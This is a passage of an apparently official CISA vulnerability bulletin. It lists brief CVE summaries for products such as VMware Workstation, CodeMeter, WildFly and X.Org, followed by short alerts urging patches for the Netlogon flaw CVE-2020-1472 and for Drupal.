    VMware Fusion (11.x) contains a privilege escalation vulnerability due to the way it allows configuring the system wide path. An attacker with normal user privileges may exploit this issue to trick an admin user into executing malicious code on the system where Fusion is installed. 2020-09-16 not yet calculated CVE-2020-3980
    MISC
    vmware -- workstation
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (EMF Parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. 2020-09-16 not yet calculated CVE-2020-3986
    MISC
    vmware -- workstation_and_horizon_client
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain a denial of service vulnerability due to an out-of-bounds write issue in Cortado ThinPrint component. A malicious actor with normal access to a virtual machine may be able to exploit this issue to create a partial denial-of-service condition on the system where Workstation or Horizon Client for Windows is installed. Exploitation is only possible if virtual printing has been enabled. This feature is not enabled by default on Workstation but it is enabled by default on Horizon Client. 2020-09-16 not yet calculated CVE-2020-3989
    MISC
    vmware -- workstation_and_horizon_client
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (EMR STRETCHDIBITS parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. 2020-09-16 not yet calculated CVE-2020-3987
    MISC
    vmware -- workstation_and_horizon_client
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an information disclosure vulnerability due to an integer overflow issue in Cortado ThinPrint component. A malicious actor with normal access to a virtual machine may be able to exploit this issue to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. Exploitation is only possible if virtual printing has been enabled. This feature is not enabled by default on Workstation but it is enabled by default on Horizon Client. 2020-09-16 not yet calculated CVE-2020-3990
    MISC
    vmware -- workstation_and_horizon_client
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (JPEG2000 parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. 2020-09-16 not yet calculated CVE-2020-3988
    MISC
    vr_cam -- p1_camera
     
    VR CAM P1 Model P1 v1 has an incorrect access control vulnerability where an attacker can obtain complete access to the device from the web (remotely) without authentication. 2020-09-15 not yet calculated CVE-2020-23512
    MISC
    webtareas -- webtareas
     
    webTareas through 2.1 allows upload of the dangerous .exe and .shtml file types. 2020-09-18 not yet calculated CVE-2020-25733
    MISC
    MISC
    MISC
    webtareas -- webtareas
     
    webTareas through 2.1 allows files/Default/ Directory Listing. 2020-09-18 not yet calculated CVE-2020-25734
    MISC
    MISC
    MISC
    webtareas -- webtareas
     
    webTareas through 2.1 allows XSS in clients/editclient.php, extensions/addextension.php, administration/add_announcement.php, administration/departments.php, administration/locations.php, expenses/claim_type.php, projects/editproject.php, and general/newnotifications.php. 2020-09-18 not yet calculated CVE-2020-25735
    MISC
    MISC
    MISC
    wibu-systems -- codemeter
     
    Protocol encryption can be easily broken for CodeMeter (All versions prior to 6.90 are affected, including Version 6.90 or newer only if CodeMeter Runtime is running as server) and the server accepts external connections, which may allow an attacker to remotely communicate with the CodeMeter API. 2020-09-16 not yet calculated CVE-2020-14517
    MISC
    wibu-systems -- codemeter
     
    This vulnerability allows an attacker to use the internal WebSockets API for CodeMeter (All versions prior to 7.00 are affected, including Version 7.0 or newer with the affected WebSockets API still enabled. This is especially relevant for systems or devices where a web browser is used to access a web server) via a specifically crafted JavaScript payload, which may allow alteration or creation of license files when combined with CVE-2020-14515. 2020-09-16 not yet calculated CVE-2020-14519
    MISC
    wibu-systems -- codemeter
     
    CodeMeter (All versions prior to 6.81) and the software using it may crash while processing a specifically crafted license file due to unverified length fields. 2020-09-16 not yet calculated CVE-2020-14513
    MISC
    wibu-systems -- codemeter
     
    Multiple memory corruption vulnerabilities exist in CodeMeter (All versions prior to 7.10) where the packet parser mechanism does not verify length fields. An attacker could send specially crafted packets to exploit these vulnerabilities. 2020-09-16 not yet calculated CVE-2020-14509
    MISC
    wibu-systems -- codemeter
     
    CodeMeter (All versions prior to 6.90 when using CmActLicense update files with CmActLicense Firm Code) has an issue in the license-file signature checking mechanism, which allows attackers to build arbitrary license files, including forging a valid license file as if it were a valid license file of an existing vendor. Only CmActLicense update files with CmActLicense Firm Code are affected. 2020-09-16 not yet calculated CVE-2020-14515
    MISC
    wildfly -- wildfly
     
    A flaw was found in all supported versions before wildfly-elytron-1.6.8.Final-redhat-00001, where the WildFlySecurityManager checks were bypassed when using custom security managers, resulting in an improper authorization. This flaw leads to information exposure by unauthenticated access to secure resources. 2020-09-16 not yet calculated CVE-2020-1748
    MISC
    wildfly -- wildfly
     
    A flaw was found in Wildfly before wildfly-embedded-13.0.0.Final, where the embedded managed process API has an exposed setting of the Thread Context Classloader (TCCL). This setting is exposed as a public method, which can bypass the security manager. The highest threat from this vulnerability is to confidentiality. 2020-09-16 not yet calculated CVE-2020-10718
    MISC
    wildfly -- wildfly
     
    A flaw was found in Wildfly's implementation of Xerces, specifically in the way the XMLSchemaValidator class in the JAXP component of Wildfly enforced the "use-grammar-pool-only" feature. This flaw allows a specially-crafted XML file to manipulate the validation process in certain cases. This issue is the same flaw as CVE-2020-14621, which affected OpenJDK, and uses similar code. All xerces jboss versions before 2.12.0.SP3 are affected. 2020-09-17 not yet calculated CVE-2020-14338
    MISC
    x.org -- x.org
     
    A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Out-Of-Bounds access in XkbSetNames function may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 not yet calculated CVE-2020-14345
    MISC
    MISC
    UBUNTU
    UBUNTU
    xmlquery -- xmlquery
     
    xmlquery before 1.3.1 lacks a check for whether a LoadURL response is in the XML format, which allows attackers to cause a denial of service (SIGSEGV) at xmlquery.(*Node).InnerText or possibly have unspecified other impact. 2020-09-16 not yet calculated CVE-2020-25614
    MISC
    MISC
    yii -- yii_2
     
    Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory. 2020-09-15 not yet calculated CVE-2020-15148
    MISC
    CONFIRM
    yworks -- yed_desktop
     
    yWorks yEd Desktop before 3.20.1 allows code execution via an XSL Transformation when using an XML file in conjunction with a custom stylesheet. 2020-09-17 not yet calculated CVE-2020-25216
    MISC
    yworks -- yed_desktop
     
    yWorks yEd Desktop before 3.20.1 allows XXE attacks via an XML or GraphML document. 2020-09-17 not yet calculated CVE-2020-25215
    MISC
    zoneminder -- zoneminder
     
    ZoneMinder before 1.34.21 has XSS via the connkey parameter to download.php or export.php. 2020-09-17 not yet calculated CVE-2020-25729
    MISC
    MISC
    MISC

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 18, 2020

    The Cybersecurity and Infrastructure Security Agency (CISA) has released Emergency Directive (ED) 20-04 addressing a critical vulnerability, CVE-2020-1472, affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker with network access to a domain controller could exploit this vulnerability to compromise all Active Directory identity services.

    Earlier this month, exploit code for this vulnerability was publicly released. Given the nature of the exploit and documented adversary behavior, CISA assumes active exploitation of this vulnerability is occurring in the wild.

    ED 20-04 applies to Executive Branch departments and agencies; however, CISA strongly recommends state and local governments, the private sector, and others patch this critical vulnerability as soon as possible. Review the following resources for more information:

  • Original release date: September 17, 2020

    The CERT Coordination Center (CERT/CC) has released information on CVE-2020-1472, a vulnerability affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker could exploit this vulnerability to obtain Active Directory domain administrator access. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following resources and apply the necessary updates and workaround.

  • Original release date: September 17, 2020

    Drupal has released security updates to address vulnerabilities in Drupal 7.x, 8.8.x, 8.9.x, and 9.0.x. An attacker could exploit some of these vulnerabilities to obtain sensitive information or leverage the way HTML is rendered.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Drupal security updates and apply the necessary updates:
